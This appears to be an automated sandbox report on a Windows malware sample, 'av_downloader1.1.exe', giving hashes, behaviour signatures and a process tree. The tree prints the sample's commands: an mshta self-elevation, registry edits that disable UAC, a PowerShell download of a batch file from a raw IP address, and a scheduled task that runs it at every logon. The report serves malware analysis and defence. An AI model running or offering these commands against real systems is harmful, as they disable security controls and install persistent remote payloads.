Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    131s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/09/2024, 11:27

General

  • Target

    av_downloader1.1.exe

  • Size

    88KB

  • MD5

    759f5a6e3daa4972d43bd4a5edbdeb11

  • SHA1

    36f2ac66b894e4a695f983f3214aace56ffbe2ba

  • SHA256

    2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

  • SHA512

    f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

  • SSDEEP

    1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe
    "C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2912
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\602C.tmp\602D.tmp\602E.bat C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4400
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
        3⤵
        • Checks computer location settings
        • Access Token Manipulation: Create Process with Token
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE
          "C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3368
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\63B6.tmp\63C7.tmp\63C8.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4256
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:2036
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:4036
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
              6⤵
              • UAC bypass
              PID:5092
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2052
              • C:\Windows\system32\reg.exe
                reg query HKEY_CLASSES_ROOT\http\shell\open\command
                7⤵
                  PID:2920
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
                6⤵
                  PID:220
                • C:\Windows\system32\attrib.exe
                  attrib +s +h d:\net
                  6⤵
                  • Sets file to hidden
                  • Views/modifies file attributes
                  PID:1288
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1704
                • C:\Windows\system32\schtasks.exe
                  SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4556
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4188,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=2904 /prefetch:1
        1⤵
          PID:2640
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4192,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=4052 /prefetch:1
          1⤵
            PID:2816
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5412,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:1
            1⤵
              PID:872
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5428,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
              1⤵
                PID:2464
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5568,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5632 /prefetch:8
                1⤵
                  PID:3480
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6084,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:1
                  1⤵
                    PID:3144
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6324,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:8
                    1⤵
                      PID:4424
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6544,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6552 /prefetch:1
                      1⤵
                        PID:1572
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5768,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:8
                        1⤵
                          PID:4852

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\602C.tmp\602D.tmp\602E.bat

                          Filesize

                          1KB

                          MD5

                          9856d2fe29a28c54c5943c2150f7bae1

                          SHA1

                          f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

                          SHA256

                          0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

                          SHA512

                          002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mazbphw3.wty.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • memory/1704-6-0x0000021E83900000-0x0000021E83922000-memory.dmp

                          Filesize

                          136KB